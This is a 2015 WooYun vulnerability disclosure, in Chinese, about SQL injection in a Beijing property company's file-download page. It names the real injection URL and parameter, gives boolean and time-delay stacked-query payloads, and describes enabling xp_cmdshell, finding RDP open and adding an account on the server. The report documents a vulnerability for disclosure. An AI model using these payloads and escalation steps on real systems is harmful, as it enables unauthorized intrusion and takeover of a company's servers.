嘉华物业某系统SQL注入sa权限

编号146400
Urlhttp://www.wooyun.org/bug.php?action=view&id=146400
漏洞状态未联系到厂商或者厂商积极忽略
漏洞标题嘉华物业某系统SQL注入sa权限
漏洞类型SQL注射漏洞
厂商北京金隅嘉业房地产
白帽子jeary
提交日期2015-10-13 13:18:00
公开日期2015-11-27 13:20:00
修复时间(not set)
确认时间0000-00-00 00:00:00
Confirm Spend-1
漏洞标签数据库账户权限过高 字符类型注射
关注数0
收藏数0
白帽评级
白帽自评rank10
厂商评级
厂商评rank15
漏洞简介
好像是嘉华大厦所属房地产公司,可惜好像日偏了,并不能查到剑MM个人信息。
漏洞细节

搜索关键字:

w1.jpg


得到链接:http://www.bj-gem.com.cn/
随意挖掘了一下,发现注入点:

http://pmcm.bj-gem.com.cn/upload/downloadfile.aspx?DocGUID=65d4f4f1-4851-44d0-9cf4-495fe84afcd2*


sa权限:

w2.jpg


payload:

true则下载文件:
65d4f4f1-4851-44d0-9cf4-495fe84afcd2 ' and 'x'='x
false文件不存在
65d4f4f1-4851-44d0-9cf4-495fe84afcd2 ' and 'x'='xx


测试是否支持多语句:

';waitfor delay'0:0:3' -- '


睡眠延时,返回true,表示支持多语句
直接恢复xp_cmdshell执行命令

w3.jpg


扫描端口后发现3389可外连,添加账号..然后。。

w4.jpg


w5.jpg


由于时间关系,未深入,只进行了初步渗透。
..

POC

PS:不要问我为啥,园长教我的..

修复方案

:)

状态信息 2015-10-13: 积极联系厂商并且等待厂商认领中,细节不对外公开
2015-11-27: 厂商已经主动忽略漏洞,细节向公众公开
厂商回复(not set)
回应信息未能联系到厂商或者厂商积极拒绝漏洞Rank:15 (WooYun评价)
Showing 1-2 of 2 items.
评论内容评论人点赞数评论时间

@zeracker 3老板,快打死他~

园长02015-10-14 13:59:00

过来.... 我保证不打死你

zeracker02015-10-13 18:35:00